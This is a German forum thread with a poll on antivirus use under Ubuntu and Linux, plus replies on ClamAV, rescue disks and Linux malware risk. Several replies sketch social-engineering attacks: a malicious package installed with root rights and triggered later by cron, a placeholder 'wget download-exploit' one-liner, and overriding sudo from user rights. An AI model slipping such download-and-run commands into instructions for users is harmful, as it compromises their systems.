Wieviele nutzen kein Antivirus unter Ubuntu? Gibt es eine Statistik dazu?

  • Ersteller Ersteller AlexanderMa
  • Erstellt am Erstellt am

Wer nutzt unter Linux ein Antivirus? Wenn ja - dann welches?

  • Kein Antivirus

    Stimmen: 81 88,0%
  • ClamAV

    Stimmen: 6 6,5%
  • Sophos

    Stimmen: 0 0,0%
  • ESET

    Stimmen: 2 2,2%
  • Dr. Web

    Stimmen: 0 0,0%
  • Sonstiges

    Stimmen: 3 3,3%

  • Umfrageteilnehmer
    92
A

AlexanderMa

Gast
Hallo Forum,

wieder mal zum Thema Antivirus, ich weiß, dass das Thema schon hundert mal durchgesprochen wurde und man viel im Internet findet. Aber, wer von euch nutzt unter Ubuntu ein Antivirusprogram?
Kann man hier eine Art Umfrage starten?

danke euch 😊
 
Ich nutze unter Ubuntu "Antivirus" zum scannen von verseuchten Windowsplatten aus bedauernswerten Computern.
Davon abgesehen wirst du eher wenig Linux-User finden, die das mit dem eigenen System als Target einsetzen.
 
  • Gefällt mir
Reaktionen: artemediathek und AudioholicA
Warum hast du nicht gleich eine Umfrage gemacht und zwar HIER UND JETZT?
 
Warum muss es Ubuntu sein? Gibt doch so viele Andere. @AlexanderMa

Ich persoenlich nutze z.B. unter Mint keine Antiviren-Software.
Allerdings nutze ich die Kaspersky Rescue Disk zum Scannen anderer Systeme/Datentraeger.
Und diese Rescue-Disk basiert auf einem "Linux".
 
  • Gefällt mir
Reaktionen: AudioholicA
Starte doch einfach ne Umfrage (die Funktion gibt's hier), am besten für alle Linux-Distros. Ich jedenfalls kenne viele Linux-Nutzer, aber keinen mit Antivirus.
 
  • Gefällt mir
Reaktionen: linuxxer und ZuseZ3
@BFF Warum hast du dein Profilbild geaendert, das alte war dein "Markenzeichen"?! :D

@Topic: Unter Debian (als Server) nutze ich schlicht ClamAV
 
  • Gefällt mir
Reaktionen: azereus und Wynn3h
AlexanderMa schrieb:
Hallo Forum,

wieder mal zum Thema Antivirus, ich weiß, dass das Thema schon hundert mal durchgesprochen wurde und man viel im Internet findet. Aber, wer von euch nutzt unter Ubuntu ein Antivirusprogram?
Kann man hier eine Art Umfrage starten?

danke euch 😊

Fallen für dich auch Sachen wie selinux, apparmor und die ganzen ebpf basierten Sachen unter Antivirus?
 
|SoulReaver| schrieb:
Warum hast du nicht gleich eine Umfrage gemacht und zwar HIER UND JETZT?
Wusste nicht, dass es geht 😊
Habe nun die Umfrage gestartet. Hier kann natürlich weiter diskutiert werden.
 
AlexanderMa schrieb:
Aber, wer von euch nutzt unter Ubuntu ein Antivirusprogram?
Ich nutze zwar Debian, aber nein, ich nutze kein AV-Programm.

Ich wüßte auch gar nicht warum man überhaupt damit anfangen sollte. Ich sehe noch ein, daß auf einem Server der die verschiedensten Systeme bedient eine solche Lösung nützlich sein könnte, aber auf einem reinen Linux-Client sehe ich keinen Grund dafür.

Sollte sich Linux auf dem Desktop eines Tages so weit verbreiten, daß es auch hier aufgrund der Verbreitung, ähnlich zu Windows, ein ernsthaftes Risiko gibt, werde ich meine Ansicht sicher noch einmal überdenken.

Live-Systeme zur Rettung von z.B. Windows-Systemen sind natürlich eine völlig andere Angelegenheit.
 
  • Gefällt mir
Reaktionen: AudioholicA
Ich halte es wie viele andere hier. Unter Linux nutze ich keine AV-Software, dafür halte ich mir für verhunzte Windowsinstallationen ein Livesystem mit Virenscanner vor.
 
Ich würde eines on demand vereinzelt womöglich einsetzen, aber soweit ich weiß gibt es doch gar kein Linux-AV? Andererseits ist mir auch nicht bekannt, dass tatsächlich Viren für Linux verbreitet werden.
 
BeBur schrieb:
aber soweit ich weiß gibt es doch gar kein Linux-AV?
Doch, die drei ersten Auswahlmöglichkeiten der Umfrage oben sind sogar ziemlich bekannt. Wobei ich jetzt nicht weiß, ob es darüber hinaus noch viele Lösungen gibt. Eine Lösung die oben fehlt ist Microsoft Defender ATP für Linux. Allerdings sind Privatkunden hier nicht wirklich die Zielgruppe.
 
Serana schrieb:
Doch, die drei ersten Auswahlmöglichkeiten der Umfrage oben sind sogar ziemlich bekannt.
Und die suchen auch nach Linux Viren? ClamAV ist doch nur gegen Windows Viren, oder nicht?
 
BeBur schrieb:
Und die suchen auch nach Linux Viren?
Angesichts der Tatsache, daß es auch für Linux Malware gibt (wenn auch nicht besonders viel oder verbreitet) ist davon auszugehen.

Auf der einen Seite ist es unter Linux deutlich schwieriger einen Virus oder Trojaner effektiv einzuschleusen. Auf der anderen Seite würde eine wachsende Verbreitung von Linux auf dem Desktop den Entwicklern von Malware in die Hände spielen.

Die weit überwiegende Menge an Schadsoftware ist auf die Kooperation der Opfer angewiesen. Phishing ist kein magischer Jetzt-habe-ich-deine-Daten Angriff. Man muß das Opfer dazu bringen seine Daten freiwillig irgendwo einzugeben. Auch die üblichen Trojaner unter Windows aktivieren sich nicht auf magische Weise von ganz alleine. Man muß das Opfer dazu bringen den Schadcode freiwillig auszuführen.

Man sieht doch auch hier auf CB immer wieder Fragesteller die irgendwelche Anweisungen die sie irgendwo im Internet gefunden haben ausführten und teilweise erst dadurch Systemprobleme bekamen. In der Mehrzahl haben diese Leute nicht die blasseste Ahnung was diese Anweisungen denn nun konkret bewirken. Sie führen die Anweisungen aus, weil irgendjemand den sie noch nie gesehen haben und dessen Motive unbekannt sind ihnen sagte, daß die Befolgung dieser Anweisungen ihr Problem lösen würde. Jemand mit bösen Absichten könnte sich genau diese Ahnungslosigkeit zunutze machen.

Wie wäre es z.B. mit einem maßgeschneiderten Linux-Paket das über die Paketverwaltung installiert wird. Die Installation läuft mit root-Rechten ab und darf im System alles machen. Kombiniert man das ganze mit einer Malware die per Cron-Job regelmäßig aufgerufen wird funktioniert das sogar zeitverzögert. Heute wird die Software installiert und in vier oder sechs Wochen aktiviert sich die Schadroutine.

Und am Anfang steht ein harmloses "sudo apt install EvilPackage"

Und ja, wer schlau genug ist einen Trojaner zu entwerfen, der ist auch schlau genug ein maßgeschneidertes Paket für die gängigen Linux-Paketsysteme zu schnüren. Ich habe selbst schon Debian-Pakete für mich selbst angepaßt, das ist nun wirklich keine Raketenwissenschaft.
 
PERKELE schrieb:
Warum hast du dein Profilbild geaendert

OT. Weil ich diese veraltete Install-Floppy von/mit W10 nicht mehr sehen konnte. 😁

BeBur schrieb:
aber soweit ich weiß gibt es doch gar kein Linux-AV?

Fast jeder groessere Hersteller bietet auch fuer Linux entsprechende Software.
Auch ist es fuer den Endanwender total unerheblich mit welchem OS ihm die Daten abgegriffen werden.
Und ja, ich hab schon Server gesehen die unter einem Linux liefen und denen dennoch die Daten in deren Freigaben verschluesselt wurden weil eben kein serverseitiger Schutz eingerichtet war.

Fuer weitere Befindlichkeiten hat es @Serana recht gut beschrieben.
 
  • Gefällt mir
Reaktionen: PERKELE
Serana schrieb:
Und am Anfang steht ein harmloses "sudo apt install EvilPackage"
Aber auch nur mit dem vorherigen Hinzufügen einer weiteren Paketquelle, sofern man nicht einen Paketserver gehackt hat.
 
  • Gefällt mir
Reaktionen: ghecko
@pseudopseudonym
Stimmt, bei apt muß man den Pfad des Pakets angeben damit es auch tatsächlich funktioniert.

Ich weiß nicht, ob es bei apt mittlerweile dokumentiert ist, daß es auch lokale Paketdateien installieren kann, aber so weit mir bekannt ist war es bei apt-get noch nicht dokumentiert. Funktioniert hat es trotzdem mWn schon immer.

Sollte der Angreifer apt nicht so gut kennen oder will er ganz sicher gehen, dann sagt er dem Opfer eben es soll stattdessen dpkg verwenden. Das hätte sogar noch den Vorteil, daß eventuell unerfüllte Dependencies keinen Strich durch die Rechnung machen können. dpkg schert sich nicht um Abhängigkeiten.
 
dazu noch 2 rpms, ein snap und ein flatpak sowie ein AUR repo anlegen nicht vergessen ;-)
 
  • Gefällt mir
Reaktionen: BeBur
Serana schrieb:
Die weit überwiegende Menge an Schadsoftware ist auf die Kooperation der Opfer angewiesen.
Ja, auf jeden Fall.

sudo apt update && sudo wget download-exploit && evil_stuff
sudo apt upgrade

Und schon hat mal malware installiert. Würde man natürlich in einem längeren Befehl verstecken.

Serana schrieb:
Und am Anfang steht ein harmloses "sudo apt install EvilPackage"
Noch nichtmal, es reicht ja vermutlich sowas wie sudo snap install normal_packagè und ähnliches.
sudo ist auch absolut nicht notwendig, man kann schließlich mit einfachen Benutzerrechten auf vielfältige Weise das Verhalten des Befehls sudo überschreiben und damit auch irgendwann bei erster Gelegenheit Vollzugrif erhalten.

Ein OS/AV das mir solche Angriffe auf die Ausführung solcher fundamentaler binaries verhindert, das wäre ja durchaus wünschenswert. Außer su/sudo nicht zu verwenden ist mir jedoch nichts bekannt.

Bei der aktuellen Kultur von "Gib mal dies und das im Terminal ein" ist die Hauptverteidigung wirklich der geringe Verbreitungsgrad von Linux und das eher IT-affine Menschen Linux einsetzen und die weniger schnell auf sowas reinfallen.
 
Ich nutze Clamav um Windows-Programme zu scannen, die unter Wine laufen. Für Spiele braucht man schon mal inoffizielle Patches etc. Auch PDF- und MS-Office-Dateien kann man mal scannen bevor man sie verbreitet. ClamAV hat auch so ein Dateisystemtreiber, damit kann man sich einen Order machen der automatisch gescannt wird (benutze ich aber nicht).

Ich habe hier eine einfache Integration für Dolphin gefunden: https://github.com/MatTaylorSharrow/ClamAVScan-Dolphin-ServiceMenu

ClamScan.sh:
options="-r"
habe ich nach
options="-ir"
geändert.

@BeBur etc.
Solange man irgendwas verändern kann, kann man halt auch ein Schadprogramm installieren. Ich habe schon Leute am Telefon angeleitet eine Batchdatei zu schreiben und dann auszuführen. Selbst der goldene Käfig von Apple bietet keinen 100% Schutz.
 
Zurück
Oben